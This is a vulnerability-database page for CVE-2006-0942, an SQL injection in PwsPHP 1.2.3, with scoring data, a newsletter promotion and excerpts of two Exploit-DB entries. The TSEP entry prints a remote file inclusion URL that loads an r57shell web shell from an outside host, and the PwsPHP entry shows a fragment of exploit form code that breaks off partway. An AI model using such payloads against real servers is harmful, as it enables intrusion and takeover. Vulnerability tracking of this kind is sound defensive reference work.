CVE-2006-0942
published 2006-03-01CVE-2006-0942: SQL injection vulnerability in profil.php in PwsPHP 1.2.3, and possibly earlier versions, allows remote attackers to execute arbitrary SQL commands via the…
PriorityP434high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.12%
62.2th percentile
SQL injection vulnerability in profil.php in PwsPHP 1.2.3, and possibly earlier versions, allows remote attackers to execute arbitrary SQL commands via the aff_news_form parameter, a different vulnerability than CVE-2005-1509.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pwsphp | pwsphp | <= 1.2.3 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TSEP 0.942 - 'colorswitch.php' Remote File Inclusion
exploitdb·2006-08-02
CVE-2006-4055 TSEP 0.942 - 'colorswitch.php' Remote File Inclusion
TSEP 0.942 - 'colorswitch.php' Remote File Inclusion
---
Script: TSEP
Comments: "register_globals" must be enabled duh.
document.this != http://www.milw0rm.com/exploits/2098
Vulnerable Files/Code:
./tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://rst.void.ru/download/r57shell.txt?
./tsep.0942/include/printpagedetails.php => require_once(
$tsep_config["absPath"]."/include/convert_htmlent.php" );
./tsep.0942/include/ipfunctions.php => require_once(
$tsep_config["absPath"]."/include/IPv6.php" );
./tsep.0942/include/contentimages.class.php => require_once(
$tsep_config["absPath"]."/include/contentimages.class.php" );
./tsep.0942/include/configfunctions.php => require_once(
$tsep_config["absPath"]."/include/mmexfunctions.php" );
./tsep.0942/include/log.class.php => require_once
Exploit-DB
PwsPHP 1.2.3 - SQL Injection
exploitdb·2006-02-09
CVE-2006-0942 PwsPHP 1.2.3 - SQL Injection
PwsPHP 1.2.3 - SQL Injection
---
source: https://www.securityfocus.com/bid/16567/info
PwsPHP is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue is reported to affect version 1.2.3; other versions may also be vulnerable.
PwsPHP 1.2.3 & "
. "to connect and logged with the cookie then to launch the exploitEnjoy.";
if(empty($_POST['url']) AND empty($_POST['pseudo']) AND empty($_POST['pass']) AND empty($_POST['nom']))
{
echo ""
. "Pseudo: "
. "Pass: "
. "Id: "
. "Name: "
. "Mail: "
. "Url: "
.
No writeups or analysis indexed.
2006-03-01
Published